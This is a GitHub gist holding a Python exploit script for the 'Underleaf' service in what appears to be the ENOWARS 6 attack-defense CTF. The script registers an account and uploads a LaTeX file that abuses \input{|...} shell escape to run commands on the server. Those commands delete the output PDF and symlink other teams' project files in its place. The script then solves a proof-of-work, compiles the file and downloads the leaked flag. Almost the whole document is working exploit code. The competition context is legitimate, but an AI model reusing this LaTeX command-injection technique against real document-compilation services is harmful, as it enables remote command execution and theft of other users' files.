Created
July 17, 2022 17:53
-
-
Save KaoRz/9a9c0d282cf1c0d93147975a3d8f3245 to your computer and use it in GitHub Desktop.
Underleaf (1st flag storage) - ENOWARS 6
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import random | |
| import string | |
| import hashlib | |
| import sys | |
| import json | |
| def get_random_str(length): | |
| letters = string.ascii_letters | |
| result_str = ''.join(random.choice(letters) for i in range(length)) | |
| return result_str | |
| def hash_string(string): | |
| return hashlib.sha256(string.encode('utf-8')).hexdigest() | |
| def get_nonce(): | |
| nonce = get_random_str(32) | |
| while True: | |
| hash = hash_string(nonce) | |
| if hash[-4:] == "0000": | |
| break | |
| nonce = get_random_str(32) | |
| return nonce | |
| def get_paths(ip): | |
| while True: | |
| try: | |
| r = requests.get("https://6.enowars.com/scoreboard/attack.json") | |
| resp = r.json() | |
| paths = [] | |
| for entries in resp["services"]["underleaf"][ip]: | |
| json_r = json.loads(resp["services"]["underleaf"][ip][entries]['0'][0]) | |
| paths.append(json_r["project_id"]) | |
| except: | |
| continue | |
| break | |
| return paths | |
| URL = "http://" + sys.argv[1] + ":4242/api/auth/register" | |
| session = requests.Session() | |
| payload = {"username": get_random_str(16), "password": "eazybobo"} | |
| response = session.request("POST", URL, json=payload) | |
| print(response.text) | |
| session.headers.update({"Authorization": "Bearer " + response.json()["token"]}) | |
| URL = "http://" + sys.argv[1] + ":4242/api/project/create" | |
| payload = {"name": "TeCameloBobo"} | |
| response = session.request("POST", URL, json=payload) | |
| print(response.text) | |
| proj_id = response.json()["id"] | |
| for flag_name in get_paths(sys.argv[1]): | |
| session.headers.update({"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8Ft20tnLvpNVqqQ"}) | |
| URL = "http://" + sys.argv[1] + ":4242/api/files/upload/" + proj_id + "/main.tex" | |
| code = "\\documentclass[12pt]{minimal}\n \\usepackage{verbatim}\n \\begin{document}\n \\input{|\"echo XGJlZ2lue3ZlcmJhdGltfQ== | base64 -d; rm /output/" + proj_id + ".pdf; ln -s ../../projects/" + flag_name[:2] + "/" + flag_name + "/main.tex /output/" + proj_id + ".pdf; exit 1; echo XGVuZHt2ZXJiYXRpbX0= | base64 -d\"} \n \\end{document}" | |
| payload = "------WebKitFormBoundaryx8Ft20tnLvpNVqqQ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file\"\r\nContent-Type: text/plain\r\n\r\n" + \ | |
| code + "\r\n------WebKitFormBoundaryx8Ft20tnLvpNVqqQ--\r\n" | |
| response = session.request("POST", URL, data=payload) | |
| print(response.text) | |
| del session.headers["Content-Type"] | |
| pow_accepted = False | |
| while not pow_accepted: | |
| URL = "http://" + sys.argv[1] + ":4242/api/latex/compile/" + proj_id | |
| payload = {'file': '/main.tex', 'proofOfWork': get_nonce()} | |
| response = session.request("POST", URL, json=payload) | |
| print(response.text) | |
| if response.json()["status"] == "ok": | |
| break | |
| URL = "http://" + sys.argv[1] + ":4242/api/latex/output/" + proj_id | |
| response = session.request("GET", URL) | |
| print(response.text, flush=True) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment